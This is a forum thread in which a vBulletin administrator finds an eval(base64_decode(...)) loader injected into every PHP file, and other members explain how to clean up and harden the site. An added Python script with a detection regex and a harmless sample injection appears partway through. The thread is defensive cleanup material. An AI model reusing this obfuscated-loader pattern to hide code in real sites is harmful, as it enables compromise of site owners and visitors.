Strange code in all my forum files ?

  • Subah
    Senior Member
    • Mar 2007
    • 302
    • 4.1.x

    Strange code in all my forum files ?

    I just found a strange code in all my forum files that end with .php?
    How can this be?
    The code is:
    Code:
    <?php /**/ eval(base64_decode("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"));?>
    And by the way, my forum was not working and it gave me a white page with an incomprehensible language like this!!

    I just replaced the old files with new files and everything works fine!
    I think this is almost from one of the hooks, right?
  • beishe8
    Senior Member
    • Oct 2005
    • 6782
    • 4.2.X

    #2
    Originally posted by Subah
    I just found a strange code in all my forum files that end with .php?
    How can this be?
    The code is:
    Code:
    <?php /**/ eval(base64_decode("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"));?>
    And by the way, my forum was not working and it gave me a white page with an incomprehensible language like this!!



    I just replaced the old files with new files and everything works fine!
    I think this is almost from one of the hooks, right?
    Probably you have been hacked.


    vB5 is unequivocally the best forum software, but not yet...


    • Floris
      Senior Member
      • Dec 2001
      • 37767

      #3
      Someone has compromised your account via MySQL or the web server, or some third-party plugin or perhaps your WordPress instance, and used that access to inject malicious code into your .php files so that upon execution they can do naughty things, such as redirect traffic or steal cookies, or whatever it might do.

      Turn off the hook system from the config.php file, turn off your forum. Replace all the vBulletin files and upgrade to the latest 3.8.5 instance if you haven't already. And change your admin and staff passwords after putting admincp/ and modcp/ and includes/ and install/ behind .htaccess/.htpasswd. Change your SFTP/FTP/SSH/MySQL/cPanel/etc. passwords. And go through the directories to find weird .hidden files or directories, or unknown files. vB can help diagnose unknown files.

      If you have third-party add-ons, remove those, or upgrade them to the latest builds. And if you have third-party software, such as WordPress, make sure it's up to date too. Upgrade those.

      Go through your footer template and see if there are any <iframe> like injections there. Same with header and forumhome, forumdisplay and showthread.

      Run the forum while it's still turned off, and see if it still executes <iframes> or the like that you don't know about, or other code, like the above. And check the files again to see if they already have newly injected stuff.

      Optionally, change hosting provider.

      There are more things you can do, such as checking read/write permissions on files and directories.

      If you feel comfortable enough, from config.php enable the hook system again and see if you get infected again *if not, continue, else, .. you run exploited plugins*.

      Good luck.

      Oh, and don't forget to ask the host to check the server log files to figure out HOW (important: HOW) they got in.
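
The file checks described in the post above (injected `eval(base64_decode(` loaders, hidden files, unknown or changed files) can be scripted. This is an added example, not part of the original thread and not vBulletin's own diagnostic; `audit`, `build_sample` and the sample file names are assumptions, and it assumes a clean copy of the same release is unpacked next to the live tree.

```python
import hashlib
import os
import re
import tempfile

# Loader shape from the thread, allowing whitespace and /**/ between tokens.
# Legitimate code can match too: a hit means "review this file", not proof.
LOADER = re.compile(rb"eval\s*(?:/\*.*?\*/\s*)*\(\s*base64_decode\s*\(", re.I | re.S)
EXPECTED_DOTFILES = {".htaccess", ".htpasswd"}

def digest(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

def audit(webroot, clean_root):
    """Compare a live tree with a freshly unpacked clean copy of the same release."""
    found = {"loader": [], "hidden": [], "unknown": [], "modified": []}
    for dirpath, dirnames, filenames in os.walk(webroot):
        for name in sorted(dirnames + filenames):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, webroot).replace(os.sep, "/")
            if name.startswith(".") and name not in EXPECTED_DOTFILES:
                found["hidden"].append(rel)
            if not os.path.isfile(full):
                continue
            with open(full, "rb") as fh:
                if LOADER.search(fh.read()):
                    found["loader"].append(rel)
            clean = os.path.join(clean_root, rel)
            if not os.path.isfile(clean):
                found["unknown"].append(rel)      # not shipped in the release
            elif digest(clean) != digest(full):
                found["modified"].append(rel)     # differs from the shipped file
    return found

def build_sample():
    """Constructed sample trees: a clean release and an 'infected' live copy."""
    base = tempfile.mkdtemp()
    files = {"index.php": "<?php echo 'forum';\n", "includes/init.php": "<?php $x = 1;\n"}
    inject = '<?php /**/ eval(base64_decode("c2FtcGxl"));?>'  # constructed, harmless
    for root in ("clean", "live"):
        for rel, body in files.items():
            path = os.path.join(base, root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write((inject if (root, rel) == ("live", "index.php") else "") + body)
    with open(os.path.join(base, "live", "includes", ".cache.php"), "w") as fh:
        fh.write("<?php // constructed unknown file\n")
    return os.path.join(base, "live"), os.path.join(base, "clean")
```

Site-specific files such as config.php and uploaded attachments will show up as unknown or modified and need manual review rather than automatic replacement.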


      • Subah
        Senior Member
        • Mar 2007
        • 302
        • 4.1.x

        #4
        I just replaced all forum files and disabled hooks; everything works fine without enabling the hooks. If I enable them I get the same problem!
        I tried to enter the product page but I got a page that looks like there is some error there, so I cannot remove or disable a product! See the picture below please!




        *click on the picture to see it in big size.


        • Floris
          Senior Member
          • Dec 2001
          • 37767

          #5
          If you disable hooks, and don't have the problem,
          and then enable hooks, and have the problem.

          I think it's clear where the culprit is hiding.


          • Subah
            Senior Member
            • Mar 2007
            • 302
            • 4.1.x

            #6
            Yes, but as you see, my product page appears with an error!
            Do you know how I can make it run normally?
            The picture that you see is of my product page while I disable hooks!


            • Subah
              Senior Member
              • Mar 2007
              • 302
              • 4.1.x

              #7
              OK, I did it.
              I just replaced the include folder with a new folder without any hook file and it works.
              Thank you, Floris.
